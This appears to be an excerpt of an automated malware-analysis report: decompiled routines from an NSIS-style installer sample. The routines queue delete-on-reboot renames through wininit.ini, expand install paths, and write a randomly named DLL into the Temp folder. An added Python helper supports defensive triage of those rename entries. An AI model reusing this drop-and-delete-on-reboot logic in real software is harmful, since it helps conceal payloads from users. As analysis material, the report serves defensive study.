                                                                          						if(_t54 == 0xffffffff) {                      // INVALID_HANDLE_VALUE
                                                                          							goto L16;
                                                                          						}
                                                                          						_t48 = GetFileSize(_t54, 0);
                                                                          						_t5 = _t42 + 0xa; // 0xa
                                                                          						_t52 = GlobalAlloc(0x40, _t48 + _t5);         // GPTR: whole file + rename line + room for a 10-byte section header
                                                                          						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
                                                                          							L15:
                                                                          							_t19 = CloseHandle(_t54);
                                                                          							goto L16;
                                                                          						} else {
                                                                          							if(E00405624(_t52, "[Rename]\r\n") != 0) {        // substring search; its result is _t25 below (decompiler temporary)
                                                                          								_t27 = E00405624(_t25 + 0xa, "\n[");          // next section header after [Rename]
                                                                          								if(_t27 == 0) {
                                                                          									L13:
                                                                          									_t28 = _t48;                              // no following section: insert at end of file
                                                                          									L14:
                                                                          									E00405670(_t52 + _t28, 0x7a0d88, _t42);   // copy the rename line into the gap
                                                                          									SetFilePointer(_t54, 0, 0, 0);            // FILE_BEGIN
                                                                          									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);   // rewrite the whole file: old size + line length
                                                                          									GlobalFree(_t52);
                                                                          									goto L15;
                                                                          								}
                                                                          								_t36 = _t27 + 1;                                  // start of the following section
                                                                          								_t43 = _t36;
                                                                          								if(_t36 >= _t52 + _t48) {
                                                                          									L21:
                                                                          									_t28 = _t36 - _t52;                           // insert in front of that section
                                                                          									goto L14;
                                                                          								} else {
                                                                          									goto L20;
                                                                          								}
                                                                          								do {
                                                                          									L20:
                                                                          									 *((char*)(_t43 + _t42)) =  *_t43;            // shift the tail forward by the line length, low address first ...
                                                                          									_t43 = _t43 + 1;                              // ... so once _t43 passes start+_t42 it reads bytes already overwritten:
                                                                          								} while (_t43 < _t52 + _t48);                     //     a following section longer than the rename line is corrupted
                                                                          								goto L21;
                                                                          							}
                                                                          							E004059BF(_t52 + _t48, "[Rename]\r\n");              // no section yet: append the header ...
                                                                          							_t48 = _t48 + 0xa;                                   // ... and count its 10 bytes
                                                                          							goto L13;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					CloseHandle(E00405690(_t50, 0, 1));                  // create the destination (CREATE_NEW) so it has a short name
                                                                          					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);     // its 8.3 name replaces "NUL" as the target
                                                                          					if(_t14 != 0 && _t14 <= 0x400) {
                                                                          						goto L5;
                                                                          					}
                                                                          				}
                                                                          				return _t14;
                                                                          			}
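The routine above is the MoveFileExA fallback that appends a "new=old" line to %WINDIR%\wininit.ini, writing NUL as the target when the file is to be deleted on the next boot. The Python below is an added example for triage, not code from the sample or from this report: it models that write with the same insertion rules, parses a recovered wininit.ini back into (target, source, delete) triples, and reproduces the forward byte loop in the listing so the effect on any section that follows [Rename] can be seen. The file names, section contents and function names are constructed for the example.

```python
# Added triage helper (not code from the sample or the report): model of the
# wininit.ini "[Rename]" fallback in E00405707 above.  All inputs constructed.
from typing import List, Optional, Tuple

RENAME_HEADER = b"[Rename]\r\n"   # the 10-byte section header the listing searches for


def add_rename_entry(ini: bytes, existing: bytes, new: Optional[bytes]) -> bytes:
    """Return `ini` with a 'new=existing' line added the way the listing does it:
    the section is created at end-of-file when missing, the line goes in front of
    the next '\\n[' section header when one follows, and the target is the literal
    'NUL' when `new` is None (delete `existing` on the next boot)."""
    line = (b"NUL" if new is None else new) + b"=" + existing + b"\r\n"
    sec = ini.find(RENAME_HEADER)
    if sec < 0:
        return ini + RENAME_HEADER + line
    nxt = ini.find(b"\n[", sec + len(RENAME_HEADER))
    if nxt < 0:
        return ini + line
    at = nxt + 1
    # slicing keeps the following section intact; compare shift_tail_like_sample()
    return ini[:at] + line + ini[at:]


def parse_rename_entries(ini: bytes) -> List[Tuple[str, str, bool]]:
    """(target, source, is_delete) for each 'target=source' line of [Rename].
    Names are returned as written; the sample stores 8.3 short names."""
    entries: List[Tuple[str, str, bool]] = []
    in_section = False
    for raw in ini.split(b"\n"):
        line = raw.rstrip(b"\r")
        if line.startswith(b"["):
            in_section = line.lower() == b"[rename]"
            continue
        if in_section and b"=" in line:
            target, source = line.split(b"=", 1)
            t = target.decode("latin-1")
            entries.append((t, source.decode("latin-1"), t.upper() == "NUL"))
    return entries


def shift_tail_like_sample(data: bytes, start: int, cch: int) -> bytes:
    """Reproduce the listing's do/while loop: move everything from `start` forward
    by `cch` bytes one byte at a time, low address first, to make room for the
    rename line.  Returns what ends up in the moved region."""
    buf = bytearray(data) + bytes(cch + 10)   # slack as in GlobalAlloc(size + cch + 10)
    end = len(data)
    p = start
    while p < end:
        buf[p + cch] = buf[p]   # once p >= start + cch this reads a byte already overwritten
        p += 1
    return bytes(buf[start + cch:end + cch])


if __name__ == "__main__":
    ini = add_rename_entry(b"", b"C:\\TEMP\\DROPPE~1.EXE", None)
    ini = add_rename_entry(ini + b"[Other]\r\nk=v\r\n", b"C:\\TEMP\\NEW~1.TMP", b"C:\\PROGRA~1\\APP.EXE")
    for target, source, is_delete in parse_rename_entries(ini):
        print("delete" if is_delete else "rename", source, "->", target)
    tail = b"[Other]\r\nk=v\r\n"
    print(shift_tail_like_sample(b"[Rename]\r\n" + tail, 10, 5))   # the section after [Rename] comes out garbled
```

On NT-family Windows the run-time lookup of MoveFileExA succeeds, so the wininit.ini branch is only the Windows 9x fallback; the artifact to check on a modern host is the PendingFileRenameOperations value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager, which is where MOVEFILE_DELAY_UNTIL_REBOOT records the same "new=old" pairs.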

                                                                          APIs
                                                                            • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                            • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                            • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                          • GetShortPathNameA.KERNEL32 ref: 00405765
                                                                          • GetShortPathNameA.KERNEL32 ref: 00405782
                                                                          • wsprintfA.USER32 ref: 004057A0
                                                                          • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                          • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                          • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                          • GlobalFree.KERNEL32 ref: 0040586C
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                            • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                            • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                          • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                          • API String ID: 3633819597-1342836890
                                                                          • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                          • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                          • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                          • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 90%
                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                          				struct tagLOGBRUSH _v16;
                                                                          				struct tagRECT _v32;
                                                                          				struct tagPAINTSTRUCT _v96;
                                                                          				struct HDC__* _t70;
                                                                          				struct HBRUSH__* _t87;
                                                                          				struct HFONT__* _t94;
                                                                          				long _t102;
                                                                          				signed int _t126;
                                                                          				struct HDC__* _t128;
                                                                          				intOrPtr _t130;
                                                                          
                                                                          				if(_a8 == 0xf) {
                                                                          					_t130 =  *0x7a2f88;
                                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                          					_a8 = _t70;
                                                                          					GetClientRect(_a4,  &_v32);
                                                                          					_t126 = _v32.bottom;
                                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                                          					while(_v32.top < _t126) {
                                                                          						_a12 = _t126 - _v32.top;
                                                                          						asm("cdq");
                                                                          						asm("cdq");
                                                                          						asm("cdq");
                                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                                          						_v32.bottom = _v32.bottom + 4;
                                                                          						_a16 = _t87;
                                                                          						FillRect(_a8,  &_v32, _t87);
                                                                          						DeleteObject(_a16);
                                                                          						_v32.top = _v32.top + 4;
                                                                          					}
                                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                          						_a16 = _t94;
                                                                          						if(_t94 != 0) {
                                                                          							_t128 = _a8;
                                                                          							_v32.left = 0x10;
                                                                          							_v32.top = 8;
                                                                          							SetBkMode(_t128, 1);
                                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                          							_a8 = SelectObject(_t128, _a16);
                                                                          							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
                                                                          							SelectObject(_t128, _a8);
                                                                          							DeleteObject(_a16);
                                                                          						}
                                                                          					}
                                                                          					EndPaint(_a4,  &_v96);
                                                                          					return 0;
                                                                          				}
                                                                          				_t102 = _a16;
                                                                          				if(_a8 == 0x46) {
                                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
                                                                          				}
                                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                          			}

                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32 ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F
                                                                          • API String ID: 941294808-1304234792
                                                                          • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                          • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
                                                                          • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
                                                                          • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 88%
                                                                          			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                                          				struct _ITEMIDLIST* _v8;
                                                                          				char _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				signed int _v24;
                                                                          				signed int _v28;
                                                                          				CHAR* _t35;
                                                                          				signed int _t37;
                                                                          				signed int _t38;
                                                                          				signed int _t49;
                                                                          				char _t51;
                                                                          				signed int _t61;
                                                                          				char* _t62;
                                                                          				char _t67;
                                                                          				signed int _t69;
                                                                          				CHAR* _t79;
                                                                          				signed int _t86;
                                                                          				signed int _t88;
                                                                          				void* _t89;
                                                                          
                                                                          				_t61 = _a8;
                                                                          				if(_t61 < 0) {
                                                                          					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
                                                                          				}
                                                                          				_t62 = _t61 +  *0x7a2fb8;
                                                                          				_t35 = 0x7a1f20;
                                                                          				_t79 = 0x7a1f20;
                                                                          				if(_a4 - 0x7a1f20 < 0x800) {
                                                                          					_t79 = _a4;
                                                                          					_a4 = _a4 & 0x00000000;
                                                                          				}
                                                                          				while(1) {
                                                                          					_t67 =  *_t62;
                                                                          					_a11 = _t67;
                                                                          					if(_t67 == 0) {
                                                                          						break;
                                                                          					}
                                                                          					__eflags = _t79 - _t35 - 0x400;
                                                                          					if(_t79 - _t35 >= 0x400) {
                                                                          						break;
                                                                          					}
                                                                          					_t62 = _t62 + 1;
                                                                          					__eflags = _t67 - 0xfc;
                                                                          					if(__eflags <= 0) {
                                                                          						if(__eflags != 0) {
                                                                          							 *_t79 = _t67;
                                                                          							_t79 =  &(_t79[1]);
                                                                          							__eflags = _t79;
                                                                          						} else {
                                                                          							 *_t79 =  *_t62;
                                                                          							_t79 =  &(_t79[1]);
                                                                          							_t62 = _t62 + 1;
                                                                          						}
                                                                          						continue;
                                                                          					}
                                                                          					_t37 =  *((char*)(_t62 + 1));
                                                                          					_t69 =  *_t62;
                                                                          					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
                                                                          					_v28 = _t69;
                                                                          					_v20 = _t37;
                                                                          					_t70 = _t69 | 0x00008000;
                                                                          					_t38 = _t37 | 0x00008000;
                                                                          					_v24 = _t69 | 0x00008000;
                                                                          					_t62 = _t62 + 2;
                                                                          					__eflags = _a11 - 0xfe;
                                                                          					_v16 = _t38;
                                                                          					if(_a11 != 0xfe) {
                                                                          						__eflags = _a11 - 0xfd;
                                                                          						if(_a11 != 0xfd) {
                                                                          							__eflags = _a11 - 0xff;
                                                                          							if(_a11 == 0xff) {
                                                                          								__eflags = (_t38 | 0xffffffff) - _t86;
                                                                          								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
                                                                          							}
                                                                          							L38:
                                                                          							_t79 =  &(_t79[lstrlenA(_t79)]);
                                                                          							_t35 = 0x7a1f20;
                                                                          							continue;
                                                                          						}
                                                                          						__eflags = _t86 - 0x1b;
                                                                          						if(_t86 != 0x1b) {
                                                                          							__eflags = (_t86 << 0xa) + 0x7a4000;
                                                                          							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
                                                                          						} else {
                                                                          							E0040591D(_t79,  *0x7a2f84);
                                                                          						}
                                                                          						__eflags = _t86 + 0xffffffeb - 6;
                                                                          						if(_t86 + 0xffffffeb < 6) {
                                                                          							L29:
                                                                          							E00405BFB(_t79);
                                                                          						}
                                                                          						goto L38;
                                                                          					}
                                                                          					_a8 = _a8 & 0x00000000;
                                                                          					 *_t79 =  *_t79 & 0x00000000;
                                                                          					_t88 = 4;
                                                                          					__eflags = _v20 - _t88;
                                                                          					if(_v20 != _t88) {
                                                                          						_t49 = _v28;
                                                                          						__eflags = _t49 - 0x2b;
                                                                          						if(_t49 != 0x2b) {
                                                                          							__eflags = _t49 - 0x26;
                                                                          							if(_t49 != 0x26) {
                                                                          								__eflags = _t49 - 0x25;
                                                                          								if(_t49 != 0x25) {
                                                                          									__eflags = _t49 - 0x24;
                                                                          									if(_t49 != 0x24) {
                                                                          										goto L19;
                                                                          									}
                                                                          									GetWindowsDirectoryA(_t79, 0x400);
                                                                          									goto L18;
                                                                          								}
                                                                          								GetSystemDirectoryA(_t79, 0x400);
                                                                          								goto L18;
                                                                          							}
                                                                          							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
                                                                          							__eflags =  *_t79;
                                                                          							if( *_t79 != 0) {
                                                                          								goto L29;
                                                                          							}
                                                                          							E004059BF(_t79, "C:\\Program Files");
                                                                          							goto L18;
                                                                          						} else {
                                                                          							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
                                                                          							L18:
                                                                          							__eflags =  *_t79;
                                                                          							if( *_t79 != 0) {
                                                                          								goto L29;
                                                                          							}
                                                                          							goto L19;
                                                                          						}
                                                                          					} else {
                                                                          						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
                                                                          						L19:
                                                                          						__eflags =  *0x7a3004;
                                                                          						if( *0x7a3004 == 0) {
                                                                          							_t88 = 2;
                                                                          						}
                                                                          						do {
                                                                          							_t88 = _t88 - 1;
                                                                          							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
                                                                          							__eflags = _t51;
                                                                          							if(_t51 != 0) {
                                                                          								 *_t79 =  *_t79 & 0x00000000;
                                                                          								__eflags =  *_t79;
                                                                          								goto L25;
                                                                          							}
                                                                          							__imp__SHGetPathFromIDListA(_v8, _t79);
                                                                          							_v12 = _t51;
                                                                          							E0040521C(_t70, _v8);
                                                                          							__eflags = _v12;
                                                                          							if(_v12 != 0) {
                                                                          								break;
                                                                          							}
                                                                          							L25:
                                                                          							__eflags = _t88;
                                                                          						} while (_t88 != 0);
                                                                          						__eflags =  *_t79;
                                                                          						if( *_t79 != 0) {
                                                                          							__eflags = _a8;
                                                                          							if(_a8 != 0) {
                                                                          								lstrcatA(_t79, _a8);
                                                                          							}
                                                                          						}
                                                                          						goto L29;
                                                                          					}
                                                                          				}
                                                                          				 *_t79 =  *_t79 & 0x00000000;
                                                                          				if(_a4 == 0) {
                                                                          					return _t35;
                                                                          				}
                                                                          				return E004059BF(_a4, _t35);
                                                                          			}

                                                                          APIs
                                                                          • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
                                                                          • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
                                                                          • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
                                                                          • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219415830.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219410198.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219423980.0000000000407000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219436699.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219478232.000000000077A000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219482863.0000000000784000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219487214.0000000000788000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219496486.0000000000795000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219503464.00000000007A1000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219507310.00000000007A9000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.219511521.00000000007AC000.00000002.00020000.sdmp
                                                                          Similarity
                                                                          • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
                                                                          • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                          • API String ID: 4227507514-3711765563
                                                                          • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                          • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
                                                                          • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
                                                                          • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 32%
                                                                          			E004026FA() {
                                                                          				void* _t23;
                                                                          				void* _t28;
                                                                          				long _t33;
                                                                          				struct _OVERLAPPED* _t48;
                                                                          				void* _t51;
                                                                          				void* _t53;
                                                                          				void* _t54;
                                                                          				CHAR* _t55;
                                                                          				void* _t58;
                                                                          				void* _t59;
                                                                          				void* _t60;
                                                                          
                                                                          				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
                                                                          				_t54 = E00402A9A(_t48);
                                                                          				_t23 = E00405538(_t54);
                                                                          				_push(_t54);
                                                                          				if(_t23 == 0) {
                                                                          					lstrcatA(E004054CC(E004059BF("C:\Users\hardz\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                          					_t55 = 0x40a018;
                                                                          				} else {
                                                                          					_push(0x40a018);
                                                                          					E004059BF();
                                                                          				}
                                                                          				E00405BFB(_t55);
                                                                          				_t28 = E00405690(_t55, 0x40000000, 2);
                                                                          				 *(_t60 + 8) = _t28;
                                                                          				if(_t28 != 0xffffffff) {
                                                                          					_t33 =  *0x7a2f8c;
                                                                          					 *(_t60 - 0x2c) = _t33;
                                                                          					_t53 = GlobalAlloc(0x40, _t33);
                                                                          					if(_t53 != _t48) {
                                                                          						E004030FF(_t48);
                                                                          						E004030CD(_t53,  *(_t60 - 0x2c));
                                                                          						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
                                                                          						 *(_t60 - 0x30) = _t58;
                                                                          						if(_t58 != _t48) {
                                                                          							_push( *(_t60 - 0x1c));
                                                                          							_push(_t58);
                                                                          							_push(_t48);
                                                                          							_push( *((intOrPtr*)(_t60 - 0x20)));
                                                                          							E00402EBD();
                                                                          							while( *_t58 != _t48) {
                                                                          								_t59 = _t58 + 8;
                                                                          								 *(_t60 - 0x38) =  *_t58;
                                                                          								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
                                                                          								_t58 = _t59 +  *(_t60 - 0x38);
                                                                          							}
                                                                          							GlobalFree( *(_t60 - 0x30));
                                                                          						}
                                                                          						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
                                                                          						GlobalFree(_t53);
                                                                          						_push(_t48);
                                                                          						_push(_t48);
                                                                          						_push( *(_t60 + 8));
                                                                          						_push(0xffffffff);
                                                                          						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
                                                                          					}
                                                                          					CloseHandle( *(_t60 + 8));
                                                                          					_t55 = 0x40a018;
                                                                          				}
                                                                          				_t51 = 0xfffffff3;
                                                                          				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
                                                                          					_t51 = 0xffffffef;
                                                                          					DeleteFileA(_t55);
                                                                          					 *((intOrPtr*)(_t60 - 4)) = 1;
                                                                          				}
                                                                          				_push(_t51);
                                                                          				E00401428();
                                                                          				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
                                                                          				return 0;
			}
                                                                          0x004026fb
                                                                          0x00402707
                                                                          0x0040270a
                                                                          0x00402711
                                                                          0x00402712
                                                                          0x00402737
                                                                          0x0040273c
                                                                          0x00402714
                                                                          0x00402719
                                                                          0x0040271a
                                                                          0x0040271a
                                                                          0x00402742
                                                                          0x0040274f
                                                                          0x00402757
                                                                          0x0040275a
                                                                          0x00402760
                                                                          0x0040276e
                                                                          0x00402773
                                                                          0x00402777
                                                                          0x0040277a
                                                                          0x00402783
                                                                          0x0040278f
                                                                          0x00402793
                                                                          0x00402796
                                                                          0x00402798
                                                                          0x0040279b
                                                                          0x0040279c
                                                                          0x0040279d
                                                                          0x004027a0
                                                                          0x004027bf
                                                                          0x004027ac
                                                                          0x004027b4
                                                                          0x004027b7
                                                                          0x004027bc
                                                                          0x004027bc
                                                                          0x004027c6
                                                                          0x004027c6
                                                                          0x004027d8
                                                                          0x004027df
                                                                          0x004027e5
                                                                          0x004027e6
                                                                          0x004027e7
                                                                          0x004027ea
                                                                          0x004027f1
                                                                          0x004027f1
                                                                          0x004027f7
                                                                          0x004027fd
                                                                          0x004027fd
                                                                          0x00402807
                                                                          0x00402808
                                                                          0x0040280c
                                                                          0x0040280e
                                                                          0x00402814
                                                                          0x00402814
                                                                          0x0040281b
                                                                          0x004021e8
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
                                                                          • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
                                                                          • GlobalFree.KERNEL32 ref: 004027C6
                                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
                                                                          • GlobalFree.KERNEL32 ref: 004027DF
                                                                          • CloseHandle.KERNEL32(?), ref: 004027F7
                                                                          • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
